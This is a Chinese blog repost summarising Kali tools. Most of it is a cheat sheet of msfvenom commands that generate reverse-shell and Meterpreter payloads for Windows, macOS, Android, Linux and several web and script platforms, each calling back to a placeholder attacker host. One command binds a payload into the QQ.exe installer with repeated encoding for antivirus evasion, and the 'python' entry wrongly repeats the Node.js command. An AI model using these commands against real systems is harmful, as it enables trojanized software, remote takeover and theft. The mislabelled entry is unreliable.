Kali 常用工具

Metasploit Framework 开源工具,方便进行渗透测试。Ruby开发的

Auxiliaries(辅助模块):负责扫描、嗅探、指纹识别等功能

Exploit(漏洞利用模块):利用安全漏洞进行攻击行为

Payload(有效载荷模块):在渗透攻击之后,用于在目标系统上执行任意命令或者执行特定的代码

Post(后期渗透模块):用于在取得目标系统远程控制权限后,进行一系统的后渗透攻击动作

Encoders(编码工具模块):主要负责免杀

Common Vulnerabiluities & Exposures(公共漏洞和暴露)

为每个漏洞和暴露破了唯一的名称

给每个漏洞和暴露一个标准化的描述

不是一个数据库面,而是一个字典

任何完全迥异的漏洞库都可以用同一个语言表述

由于语言统一可以使得安全事件报告更好地被理解,实现更好的协调工作

可以成为评价相应工具和数据库的基准

windows/meterpreter/reverse_tcp

java/meterpreter/reverse_tcp

php/meterpreter/reverse_tcp

php/meterpreter_reverse_tcp

ruby/shell_reverse_tcp

cmd/unix/interact

cmd/unix/reverse

cmd/unix/reverse_perl

cmd/unix/reverse_netcat_gaping

windows/meterpreter/reverse_nonx_tcp

windows/meterpreter/reverse_ord_tcp

windows/shell/reverse_tcp

generic/shell_reverse_tcp

windows

msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -o payload.exe — 编码3次以exe输出, 输文件名字叫payload

msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -x D:/QQ.exe -i 5 -f exe -o c:/QQ1.exe —附加在qq.exe上,进行5次编码后以exe文件输出,输出的名字叫qq1

mac

msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

powershell

msfvenom -a x86 —platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux

msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

php

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘n’ > shell.php && pbpaste >>shell.php

aspx

msfvenom -a x86 —platform windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp

msfvenom —platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.war

node js

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js

python

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js

perl

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

lua

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

windows shellCode

msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

Linux Shell

msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac shell

msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPLPORT=攻击机端口 -f c

目前世界上最多人使用的系统漏洞扫描与分析软件

号称世界上最流行的漏洞扫描程序

Nessus提供了完整的漏洞扫描服务,并随时更新漏洞库。Nessus提供服务器和WEB客户端

安装过程 :https://blog.csdn.net/wwl012345/article/details/96998187

原文链接:https://blog.csdn.net/tryheart/article/details/108681312?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165277037516781683930217%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165277037516781683930217&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-29-108681312-null-null.nonecase&utm_term=%E5%AE%9E%E7%94%A8%E5%B7%A5%E5%85%B7

© 版权声明
THE END
喜欢就支持一下吧
点赞0打赏 分享
评论 抢沙发
头像
文明发言,共建和谐米科社区
提交
头像

昵称

取消
昵称表情图片